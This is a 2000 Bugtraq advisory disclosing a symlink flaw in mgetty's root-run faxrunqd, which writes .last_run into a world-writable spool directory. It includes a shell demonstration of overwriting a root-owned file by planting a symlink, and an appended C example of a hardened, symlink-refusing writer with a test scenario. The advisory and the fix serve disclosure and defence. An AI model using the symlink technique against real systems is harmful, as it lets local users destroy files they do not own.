Date:         Sat, 26 Aug 2000 02:23:05 -0400
From: Stan Bubrouski <satan@FASTDIAL.NET>
Subject:      Advisory: mgetty local compromise
To: BUGTRAQ@SECURITYFOCUS.COM

Author            : Stan Bubrouski
Date              : August 26, 2000
Package           : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity          : faxrunqd follows symbolic links when creating certain
                    files. The default location for the files is
                    /var/spool/fax/outgoing, which is a world-writable
                    directory. Local users can destroy the contents of any
                    file on a mounted filesystem because faxrunqd is
                    usually run by root.
Problem           : mgetty comes with a program named faxrunqd, which is a
                    daemon to send fax jobs queued by faxspool(1). Upon
                    successful execution, a file named .last_run is created
                    in the /var/spool/fax/outgoing/ directory, which is
                    world-writable. The problem lies in the fact that
                    faxrunqd will follow symlinks created by any user,
                    allowing file creation anywhere and allowing existing
                    files to be overwritten/destroyed.
Example:

Remote unprivileged user:
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:46 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--    1 root     root           12 Jun  2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...

Remote unprivileged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:48 ..
lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--    1 root     root           44 Jun  2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun  2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$

Believed to be vulnerable:

Red Hat Linux 6.2 and all prior versions            (Vulnerable)
Linux-Mandrake 7.1 and all prior versions           (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1                   (Untested)
LinuxPPC 1999 and 2000                              (Untested)
TurboLinux 4.0, 6.0                                 (Untested)
Debian 2.2 (potato), 2.1 (slink)                    (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2      (Untested)
MkLinux Pre Release 1 (R1)                          (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4                     (Untested)
Think Blue Linux 1.0 (Linux for the S/390)          (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...

Believed to be unaffected:
SuSE - all versions
Slackware - all versions
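Added illustration, not part of the advisory or of mgetty's own code: the check a root-run daemon should make before writing a status file such as .last_run into a world-writable directory like /var/spool/fax/outgoing. The open uses O_NOFOLLOW so a planted symlink is refused, and the opened object is verified before it is truncated. The names write_status_file and run_scenario are hypothetical; the scenario builds its own scratch directory under /tmp and mirrors the advisory's "Smash me!!!" file.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical hardened way to (re)write a status file in a world-writable
 * spool directory. O_NOFOLLOW makes open() fail (ELOOP on Linux) when the last
 * path component is a symlink; fstat() then rejects anything that is not a
 * single-link regular file we own; only after that is the file truncated. */
int write_status_file(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_NONBLOCK, 0644);
    if (fd < 0) return -1;                  /* symlink planted: refused here */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd); errno = EPERM; return -1; /* hard link, FIFO, foreign file */
    }
    size_t len = strlen(text);
    int ok = ftruncate(fd, 0) == 0 && write(fd, text, len) == (ssize_t)len;
    close(fd);
    return ok ? 0 : -1;
}

/* Constructed scenario: a protected file, a symlink to it planted under the
 * name .last_run, and a clean name. Returns 0 when the write through the
 * symlink is refused, the protected file is intact and the clean name works. */
int run_scenario(void)
{
    char dir[] = "/tmp/spoolXXXXXX", target[64], link[64], plain[64], buf[64] = {0};
    if (!mkdtemp(dir)) return 1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(link, sizeof link, "%s/.last_run", dir);
    snprintf(plain, sizeof plain, "%s/.last_run_ok", dir);
    FILE *f = fopen(target, "w");
    if (!f || fputs("Smash me!!!", f) == EOF || fclose(f) != 0) return 2;
    if (symlink(target, link) != 0) return 3;
    if (write_status_file(link, "stamp") == 0) return 4;    /* must be refused */
    f = fopen(target, "r");
    if (!f || !fgets(buf, sizeof buf, f)) return 5;
    fclose(f);
    if (strcmp(buf, "Smash me!!!") != 0) return 6;           /* still intact */
    if (write_status_file(plain, "stamp") != 0) return 7;   /* normal case works */
    unlink(plain); unlink(link); unlink(target); rmdir(dir);
    return 0;
}
```

The fstat() step matters because O_NOFOLLOW alone does not protect against a hard link to the victim file, and the sticky bit on the spool directory is what stops other users from removing the daemon's own file once created.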